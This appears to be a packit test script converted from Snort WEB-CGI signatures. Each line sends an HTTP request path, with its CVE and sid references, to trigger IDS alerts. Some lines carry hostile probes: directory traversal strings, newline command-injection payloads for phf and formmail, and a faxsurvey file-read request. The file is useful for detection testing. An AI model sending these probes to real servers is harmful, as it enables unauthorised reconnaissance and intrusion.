"/apexec.pl" -p "template=../" # "WEB-CGI anaconda directory transversal attempt" nocase-ignored cve,CVE-2000-0975 bugtraq,2388 classtype:web-application-attack sid:820 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/imagemap.exe?" # "WEB-CGI imagemap.exe overflow attempt" nocase-ignored arachnids,412 cve,CVE-1999-0951 classtype:web-application-attack sid:821 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/imagemap.exe" # "WEB-CGI imagemap.exe access" nocase-ignored cve,CVE-1999-0951 arachnids,412 classtype:web-application-activity sid:1700 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/cvsweb.cgi" # "WEB-CGI cvsweb.cgi access" nocase-ignored cve,CVE-2000-0670 bugtraq,1469 classtype:attempted-recon sid:823 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/php.cgi" # "WEB-CGI php.cgi access" nocase-ignored cve,CAN-1999-0238 bugtraq,2250 arachnids,232 classtype:attempted-recon sid:824 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/glimpse" # "WEB-CGI glimpse access" nocase-ignored bugtraq,2026 classtype:attempted-recon sid:825 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/htmlscript?../.." # "WEB-CGI htmlscript attempt" nocase-ignored bugtraq,2001 cve,CVE-1999-0264 classtype:web-application-attack sid:1608 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/htmlscript" # "WEB-CGI htmlscript access" nocase-ignored bugtraq,2001 cve,CVE-1999-0264 classtype:attempted-recon sid:826 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/info2www" # "WEB-CGI info2www access" nocase-ignored bugtraq,1995 cve,CVE-1999-0266 classtype:attempted-recon sid:827 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/maillist.pl" # "WEB-CGI maillist.pl access" nocase-ignored classtype:attempted-recon sid:828 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/nph-test-cgi" # "WEB-CGI nph-test-cgi access" nocase-ignored nessus,10165 arachnids,224 cve,CVE-1999-0045 bugtraq,686 classtype:attempted-recon sid:829 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/nph-maillist.pl" # "WEB-CGI NPH-publish access" nocase-ignored cve,CAN-2001-0400 classtype:attempted-recon sid:1451 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/nph-publish" # "WEB-CGI NPH-publish access" nocase-ignored cve,CAN-1999-1177 classtype:attempted-recon sid:830 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/rguest.exe" # "WEB-CGI rguest.exe access" nocase-ignored cve,CAN-1999-0467 bugtraq,2024 classtype:attempted-recon sid:833 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/rwwwshell.pl" # "WEB-CGI rwwwshell.pl access" nocase-ignored url,www.itsecurity.com/papers/p37.htm classtype:attempted-recon sid:834 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/test-cgi/*?*" # "WEB-CGI test-cgi attempt" nocase-ignored nessus,10282 cve,CVE-1999-0070 arachnids,218 classtype:web-application-attack sid:1644 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/test-cgi" # "WEB-CGI test-cgi access" nocase-ignored nessus,10282 cve,CVE-1999-0070 arachnids,218 classtype:attempted-recon sid:835 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/testcgi" # "WEB-CGI testcgi access" nocase-ignored nessus,11610 bugtraq,7214 classtype:web-application-activity sid:1645 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/test.cgi" # "WEB-CGI test.cgi access" nocase-ignored classtype:web-application-activity sid:1646 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/textcounter.pl" # "WEB-CGI textcounter.pl access" nocase-ignored cve,CAN-1999-1479 classtype:attempted-recon sid:836 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/uploader.exe" # "WEB-CGI uploader.exe access" nocase-ignored cve,CVE-1999-0177 nessus,10291 classtype:attempted-recon sid:837 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/webgais" # "WEB-CGI webgais access" nocase-ignored arachnids,472 bugtraq,2058 cve,CVE-1999-0176 nessus,10300 classtype:attempted-recon sid:838 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/finger" # "WEB-CGI finger access" nocase-ignored arachnids,221 cve,CVE-1999-0612 nessus,10071 classtype:attempted-recon sid:839 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/perlshop.cgi" # "WEB-CGI perlshop.cgi access" nocase-ignored cve,CAN-1999-1374 classtype:attempted-recon sid:840 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/pfdisplay.cgi" # "WEB-CGI pfdisplay.cgi access" nocase-ignored bugtraq,64 cve,CVE-1999-0270 classtype:attempted-recon sid:841 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/aglimpse" # "WEB-CGI aglimpse access" nocase-ignored nessus,10095 cve,CVE-1999-0147 bugtraq,2026 classtype:attempted-recon sid:842 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/AnForm2" # "WEB-CGI anform2 access" nocase-ignored cve,CVE-1999-0066 arachnids,225 classtype:attempted-recon sid:843 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/args.bat" # "WEB-CGI args.bat access" nocase-ignored cve,CAN-1999-1374 classtype:attempted-recon sid:844 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/args.cmd" # "WEB-CGI args.cmd access" nocase-ignored cve,CAN-1999-1374 classtype:attempted-recon sid:1452 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/AT-admin.cgi" # "WEB-CGI AT-admin.cgi access" nocase-ignored cve,CAN-1999-1072 classtype:attempted-recon sid:845 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/AT-generated.cgi" # "WEB-CGI AT-generated.cgi access" nocase-ignored cve,CAN-1999-1072 classtype:attempted-recon sid:1453 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/bnbform.cgi" # "WEB-CGI bnbform.cgi access" nocase-ignored cve,CVE-1999-0937 bugtraq,1469 classtype:attempted-recon sid:846 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/campas" # "WEB-CGI campas access" nocase-ignored cve,CVE-1999-0146 bugtraq,1975 classtype:attempted-recon sid:847 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/view-source" -p "../" # "WEB-CGI view-source directory traversal" nocase-ignored nocase-ignored cve,CVE-1999-0174 classtype:web-application-attack sid:848 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/view-source" # "WEB-CGI view-source access" nocase-ignored cve,CVE-1999-0174 classtype:attempted-recon sid:849 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/wais.pl" # "WEB-CGI wais.pl access" nocase-ignored classtype:attempted-recon sid:850 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/wwwwais" # "WEB-CGI wwwwais access" nocase-ignored nessus,10597 cve,CAN-2001-0223 classtype:attempted-recon sid:1454 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/files.pl" # "WEB-CGI files.pl access" nocase-ignored cve,CAN-1999-1081 classtype:attempted-recon sid:851 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/wguest.exe" # "WEB-CGI wguest.exe access" nocase-ignored cve,CAN-1999-0467 bugtraq,2024 classtype:attempted-recon sid:852 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/wrap" # "WEB-CGI wrap access" nessus,10317 bugtraq,373 arachnids,234 cve,CVE-1999-0149 classtype:attempted-recon sid:853 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/classifieds.cgi" # "WEB-CGI classifieds.cgi access" nocase-ignored bugtraq,2020 cve,CVE-1999-0934 classtype:attempted-recon sid:854 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/environ.cgi" # "WEB-CGI environ.cgi access" nocase-ignored classtype:attempted-recon sid:856 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/faxsurvey?/" # "WEB-CGI faxsurvey attempt (full path)" nocase-ignored cve,CVE-1999-0262 bugtraq,2056 nessus,10067 classtype:web-application-attack sid:1647 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/faxsurvey?cat%20" # "WEB-CGI faxsurvey arbitrary file read attempt" nocase-ignored nessus,10067 cve,CVE-1999-0262 bugtraq,2056 classtype:web-application-attack sid:1609 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/faxsurvey" # "WEB-CGI faxsurvey access" nocase-ignored cve,CVE-1999-0262 bugtraq,2056 nessus,10067 classtype:web-application-activity sid:857 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/filemail.pl" # "WEB-CGI filemail access" nocase-ignored cve,CAN-1999-1154 classtype:attempted-recon sid:858 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/man.sh" # "WEB-CGI man.sh access" nocase-ignored cve,CAN-1999-1179 classtype:attempted-recon sid:859 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/snork.bat" # "WEB-CGI snork.bat access" nocase-ignored bugtraq,1053 cve,CVE-2000-0169 arachnids,220 classtype:attempted-recon sid:860 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/w3-msql/" # "WEB-CGI w3-msql access" nocase-ignored bugtraq,591 cve,CVE-1999-0276 arachnids,210 nessus,10296 cve,CVE-2000-0012 classtype:attempted-recon sid:861 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/day5datacopier.cgi" # "WEB-CGI day5datacopier.cgi access" nocase-ignored cve,CAN-1999-1232 classtype:attempted-recon sid:863 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/day5datanotifier.cgi" # "WEB-CGI day5datanotifier.cgi access" nocase-ignored cve,CAN-1999-1232 classtype:attempted-recon sid:864 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/post-query" # "WEB-CGI post-query access" nocase-ignored cve,CAN-2001-0291 classtype:attempted-recon sid:866 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/visadmin.exe" # "WEB-CGI visadmin.exe access" nocase-ignored bugtraq,1808 cve,CAN-1999-1970 nessus,10295 classtype:attempted-recon sid:867 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/dumpenv.pl" # "WEB-CGI dumpenv.pl access" nocase-ignored cve,CAN-1999-1178 classtype:attempted-recon sid:869 #packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/calendar_admin.pl?config=|" #Cannot convert: check backslash escaping. "WEB-CGI calendar_admin.pl arbitrary command execution attempt" classtype:web-application-attack cve,CVE-2000-0432 sid:1536 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/calendar_admin.pl" # "WEB-CGI calendar_admin.pl access" classtype:web-application-activity cve,CVE-2000-0432 sid:1537 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/calendar-admin.pl" # "WEB-CGI calendar-admin.pl access" nocase-ignored bugtraq,1215 classtype:web-application-activity sid:1701 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/calender.pl" # "WEB-CGI calender.pl access" nocase-ignored cve,CVE-2000-0432 classtype:attempted-recon sid:1455 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/calendar" # "WEB-CGI calendar access" nocase-ignored classtype:attempted-recon sid:882 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/user_update_admin.pl" # "WEB-CGI user_update_admin.pl access" nocase-ignored cve,CVE-2000-0627 classtype:attempted-recon sid:1457 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/user_update_passwd.pl" # "WEB-CGI user_update_passwd.pl access" nocase-ignored cve,CVE-2000-0627 classtype:attempted-recon sid:1458 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/snorkerz.cmd" # "WEB-CGI snorkerz.cmd access" nocase-ignored classtype:attempted-recon sid:870 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/survey.cgi" # "WEB-CGI survey.cgi access" nocase-ignored bugtraq,1817 cve,CVE-1999-0936 classtype:attempted-recon sid:871 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "///" # "WEB-CGI scriptalias access" cve,CVE-1999-0236 bugtraq,2300 arachnids,227 classtype:attempted-recon sid:873 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/win-c-sample.exe" # "WEB-CGI win-c-sample.exe access" nocase-ignored bugtraq,2078 arachnids,231 cve,CVE-1999-0178 nessus,10008 classtype:attempted-recon sid:875 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/w3tvars.pm" # "WEB-CGI w3tvars.pm access" nocase-ignored classtype:attempted-recon sid:878 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/admin.pl" # "WEB-CGI admin.pl access" nocase-ignored url,online.securityfocus.com/archive/1/249355 bugtraq,3839 classtype:attempted-recon sid:879 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/LWGate" # "WEB-CGI LWGate access" nocase-ignored url,www.netspace.org/~dwb/lwgate/lwgate-history.html url,www.wiretrip.net/rfp/p/doc.asp/i2/d6.htm classtype:attempted-recon sid:880 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/archie" # "WEB-CGI archie access" nocase-ignored classtype:attempted-recon sid:881 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/flexform" # "WEB-CGI flexform access" nocase-ignored url,www.wiretrip.net/rfp/p/doc.asp/i2/d6.htm classtype:attempted-recon sid:883 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/formmail" -p "%0a" # "WEB-CGI formmail arbitrary command execution attempt" nocase-ignored nocase-ignored nessus,10782 nessus,10076 bugtraq,1187 cve,CVE-1999-0172 arachnids,226 classtype:web-application-attack sid:1610 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/formmail" # "WEB-CGI formmail access" nocase-ignored nessus,10782 nessus,10076 bugtraq,1187 cve,CVE-1999-0172 arachnids,226 classtype:web-application-activity sid:884 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/phf" -p "QALIAS" -p "%0a/" # "WEB-CGI phf arbitrary command execution attempt" nocase-ignored nocase-ignored bugtraq,629 arachnids,128 cve,CVE-1999-0067 classtype:web-application-attack sid:1762 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/phf" # "WEB-CGI phf access" nocase-ignored bugtraq,629 arachnids,128 cve,CVE-1999-0067 classtype:web-application-activity sid:886 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/www-sql" # "WEB-CGI www-sql access" nocase-ignored url,marc.theaimsgroup.com/?l=bugtraq&m=88704258804054&w=2 classtype:attempted-recon sid:887 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/wwwadmin.pl" # "WEB-CGI wwwadmin.pl access" nocase-ignored classtype:attempted-recon sid:888 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/ppdscgi.exe" # "WEB-CGI ppdscgi.exe access" nocase-ignored bugtraq,491 url,online.securityfocus.com/archive/1/16878 classtype:attempted-recon sid:889 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/sendform.cgi" # "WEB-CGI sendform.cgi access" nocase-ignored cve,CAN-2002-0710 bugtraq,5286 url,www.scn.org/help/sendform.txt classtype:attempted-recon sid:890 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/upload.pl" # "WEB-CGI upload.pl access" nocase-ignored classtype:attempted-recon sid:891 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/AnyForm2" # "WEB-CGI AnyForm2 access" nocase-ignored bugtraq,719 cve,CVE-1999-0066 classtype:attempted-recon sid:892 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/MachineInfo" # "WEB-CGI MachineInfo access" nocase-ignored cve,CAN-1999-1067 classtype:attempted-recon sid:893 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/bb-hist.sh?HISTFILE=../.." # "WEB-CGI bb-hist.sh attempt" nocase-ignored nessus,10025 cve,CAN-1999-1462 bugtraq,142 classtype:web-application-attack sid:1531 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/bb-hist.sh" # "WEB-CGI bb-hist.sh access" nocase-ignored nessus,10025 cve,CAN-1999-1462 bugtraq,142 classtype:attempted-recon sid:894 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/bb-histlog.sh" # "WEB-CGI bb-histlog.sh access" nocase-ignored bugtraq,142 cve,CAN-1999-1462 classtype:attempted-recon sid:1459 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/bb-histsvc.sh" # "WEB-CGI bb-histsvc.sh access" nocase-ignored bugtraq,142 cve,CAN-1999-1462 classtype:attempted-recon sid:1460 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/bb-hostsvc.sh?HOSTSVC?../.." # "WEB-CGI bb-hostscv.sh attempt" nocase-ignored nessus,10460 cve,CVE-2000-0638 classtype:web-application-attack sid:1532 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/bb-hostsvc.sh" # "WEB-CGI bb-hostscv.sh access" nocase-ignored nessus,10460 cve,CVE-2000-0638 classtype:web-application-activity sid:1533 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/bb-rep.sh" # "WEB-CGI bb-rep.sh access" nocase-ignored bugtraq,142 cve,CAN-1999-1462 classtype:attempted-recon sid:1461 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/bb-replog.sh" # "WEB-CGI bb-replog.sh access" nocase-ignored bugtraq,142 cve,CAN-1999-1462 classtype:attempted-recon sid:1462 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/redirect" # "WEB-CGI redirect access" nocase-ignored bugtraq,1179 cve,CVE-2000-0382 classtype:attempted-recon sid:895 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/way-board/way-board.cgi" -p "db=" -p "../.." # "WEB-CGI wayboard attempt" nocase-ignored bugtraq,2370 cve,CAN-2001-0214 classtype:web-application-attack sid:1397 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/way-board" # "WEB-CGI way-board access" nocase-ignored bugtraq,2370 cve,CAN-2001-0214 nessus,10610 classtype:web-application-activity sid:896 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/pals-cgi" -p "documentName=" # "WEB-CGI pals-cgi arbitrary file access attempt" nocase-ignored classtype:web-application-attack cve,CAN-2001-0217 bugtraq,2372 nessus,10611 sid:1222 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/pals-cgi" # "WEB-CGI pals-cgi access" nocase-ignored cve,CAN-2001-0216 cve,CAN-2001-0217 bugtraq,2372 nessus,10611 classtype:attempted-recon sid:897 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/commerce.cgi" -p "page=" -p "/../" # "WEB-CGI commerce.cgi arbitrary file access attempt" nocase-ignored nessus,10612 bugtraq,2361 cve,CAN-2001-0210 classtype:attempted-recon sid:1572 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/commerce.cgi" # "WEB-CGI commerce.cgi access" nocase-ignored nessus,10612 bugtraq,2361 cve,CAN-2001-0210 classtype:attempted-recon sid:898 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/sendtemp.pl" -p "templ=" # "WEB-CGI Amaya templates sendtemp.pl directory traversal attempt" nocase-ignored nocase-ignored bugtraq,2504 cve,CAN-2001-0272 classtype:web-application-attack sid:899 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/sendtemp.pl" # "WEB-CGI Amaya templates sendtemp.pl access" nocase-ignored bugtraq,2504 cve,CAN-2001-0272 classtype:web-application-activity sid:1702 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/webspirs.cgi" -p "../../" # "WEB-CGI webspirs.cgi directory traversal attempt" nocase-ignored nocase-ignored cve,CAN-2001-0211 bugtraq,2362 nessus,10616 classtype:web-application-attack sid:900 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/webspirs.cgi" # "WEB-CGI webspirs.cgi access" nocase-ignored cve,CAN-2001-0211 bugtraq,2362 nessus,10616 classtype:attempted-recon sid:901 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "tstisapi.dll" # "WEB-CGI tstisapi.dll access" nocase-ignored cve,CAN-2001-0302 classtype:attempted-recon sid:902 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/sendmessage.cgi" # "WEB-CGI sendmessage.cgi access" nocase-ignored classtype:attempted-recon sid:1308 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/lastlines.cgi" # "WEB-CGI lastlines.cgi access" nocase-ignored bugtraq,3755 bugtraq,3754 classtype:attempted-recon sid:1392 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/zml.cgi" -p "file=../" # "WEB-CGI zml.cgi attempt" cve,CAN-2001-1209 bugtraq,3759 classtype:web-application-activity sid:1395 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/zml.cgi" # "WEB-CGI zml.cgi access" cve,CAN-2001-1209 bugtraq,3759 classtype:web-application-activity sid:1396 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/publisher/search.cgi" -p "template=" # "WEB-CGI AHG search.cgi access" nocase-ignored nocase-ignored bugtraq,3985 classtype:web-application-activity sid:1405 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/store/agora.cgi?cart_id=